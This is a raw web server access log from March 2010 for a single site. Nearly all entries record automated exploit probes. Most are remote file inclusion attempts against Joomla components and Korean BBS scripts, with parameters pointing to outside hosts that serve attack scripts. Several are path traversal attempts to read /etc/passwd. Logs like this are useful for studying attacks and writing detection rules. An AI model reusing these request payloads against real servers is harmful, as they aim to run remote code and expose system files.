173.212.202.130 - - [04/Mar/2010:06:15:15 -0800] "GET /logs/access_100204.log//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:06:15:35 -0800] "GET /logs/access_100211.log//bbs/write_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [04/Mar/2010:06:16:02 -0800] "GET /logs/access_100204.log//components/com_flyspray/startdown.php?file=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:16:57 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:16:57 -0800] "GET /logs/access_100203.log%20%20//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:16:58 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:17:30 -0800] "GET /bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:17:30 -0800] "GET /logs//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.63.96.201 - - [04/Mar/2010:06:17:30 -0800] "GET /logs/access_100226.log%20%20//bbs/mail.inc.php?skin_board_path=http://mycomputerdaddy.com/momma/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [04/Mar/2010:06:17:53 -0800] "GET /logs/access_100217.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [04/Mar/2010:06:17:53 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [04/Mar/2010:06:17:53 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:18 -0800] "GET /logs/access_100203.log%20%20//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:18 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:19 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:22 -0800] "GET /logs/access_100203.log%20%20//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:22 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:22 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:26 -0800] "GET /logs/access_100206.log%20%20//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:18:29 -0800] "GET /logs/access_100206.log%20%20//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:05 -0800] "GET /logs/access_100206.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:05 -0800] "GET /logs/access_100203.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:05 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:06 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:19:41 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:19:41 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:19:41 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:19:42 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:19:42 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:19:42 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:19:51 -0800] "GET /logs/access_100203.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:19:51 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:19:51 -0800] "GET /logs/access_100206.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:19:51 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:53 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:53 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:53 -0800] "GET /logs/access_100203.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [04/Mar/2010:06:19:54 -0800] "GET /logs/access_100206.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:20:01 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:20:01 -0800] "GET /logs//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:20:01 -0800] "GET /logs/access_100203.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:20:01 -0800] "GET /logs/access_100206.log//?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [04/Mar/2010:06:20:02 -0800] "GET /?_zb_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:20:03 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [04/Mar/2010:06:21:04 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [04/Mar/2010:06:21:04 -0800] "GET /logs/access_100217.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:06:21:32 -0800] "GET /administrator/components/com_sef/sh404sef.class.php?mosConfig_absolute_path=http://www.lifehappens.org/cache/nulnul/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:06:21:32 -0800] "GET /logs//administrator/components/com_sef/sh404sef.class.php?mosConfig_absolute_path=http://www.lifehappens.org/cache/nulnul/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:06:23:36 -0800] "GET /administrator/components/com_sef/readme.inc.php?mosConfig_absolute_path=http://www.lifehappens.org/cache/nulnul/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
216.119.103.16 - - [04/Mar/2010:06:23:36 -0800] "GET /logs//administrator/components/com_sef/readme.inc.php?mosConfig_absolute_path=http://www.lifehappens.org/cache/nulnul/test.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.puaga.com"
222.122.25.99 - - [04/Mar/2010:06:23:47 -0800] "GET /logs/access.log//index.htm/connect.lib.php?g4[path]=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [04/Mar/2010:06:23:47 -0800] "GET /index.htm/connect.lib.php?g4[path]=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [04/Mar/2010:06:23:47 -0800] "GET /logs//index.htm/connect.lib.php?g4[path]=http://voiptechnocrats.com/command/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:26:10 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:26:10 -0800] "GET /logs/access_100208.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:26:10 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:26:27 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:26:27 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:26:27 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:26:55 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:26:55 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:06:26:55 -0800] "GET /logs/access_100128.log%20%20//bbs/write_comment_update.php?board_skin_path=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:06:27:10 -0800] "GET /logs//administrator/components/com_sef/readme.inc.php?mosConfig_absolute_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:06:27:11 -0800] "GET /logs/access_100224.log//administrator/components/com_sef/readme.inc.php?mosConfig_absolute_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [04/Mar/2010:06:27:11 -0800] "GET /administrator/components/com_sef/readme.inc.php?mosConfig_absolute_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt????%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:30:00 -0800] "GET /logs/access_100214.log%20%20//bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:30:57 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:30:57 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:30:57 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:31:10 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:31:15 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:31:15 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:31:22 -0800] "GET /logs/access_100219.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:06:31:23 -0800] "GET /logs/access_100210.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:31:31 -0800] "GET /logs/access_100219.log%20%20//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [04/Mar/2010:06:31:52 -0800] "GET /logs/access_100205.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:35:05 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:35:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:35:05 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:35:22 -0800] "GET /logs/access_091109.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:35:43 -0800] "GET /logs/access_091109.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:06:35:56 -0800] "GET /logs/access_100220.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:36:53 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:37:02 -0800] "GET /logs/access_100220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:39:54 -0800] "GET /logs/access_100128.log//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:39:54 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:39:54 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:08 -0800] "GET /logs/access_100214.log//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:06:40:18 -0800] "GET /logs/access_100211.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:06:40:18 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:06:40:18 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:18 -0800] "GET /logs/access_100128.log//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:18 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:19 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:21 -0800] "GET /TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:21 -0800] "GET /logs/access_100128.log//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:40:22 -0800] "GET /logs/access_100128.log//bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:26 -0800] "GET /logs//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:28 -0800] "GET /logs/access_100214.log//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [04/Mar/2010:06:40:32 -0800] "GET /logs/access_100211.log//bbs/write_comment_update.php?board_skin_path=http://chefartsmith.net/cms/tmp/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:06:40:32 -0800] "GET /logs/access_100214.log//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:06:40:41 -0800] "GET /logs/access_100128.log%20/index.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:06:40:41 -0800] "GET /logs/index.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
67.225.243.237 - - [04/Mar/2010:06:40:42 -0800] "GET /index.php?page=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:06:40:43 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kzblog.iswift.eu//forum/combro/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:06:40:43 -0800] "GET /logs/access_100207.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kzblog.iswift.eu//forum/combro/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:06:40:43 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kzblog.iswift.eu//forum/combro/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:06:41:18 -0800] "GET /logs/access_100210.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kzblog.iswift.eu//forum/combro/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:06:41:42 -0800] "GET /logs/access_100219.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.167.221.65 - - [04/Mar/2010:06:41:48 -0800] "GET /logs/access_100211.log%20%20//TotalCalendar/about.php?inc_dir=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
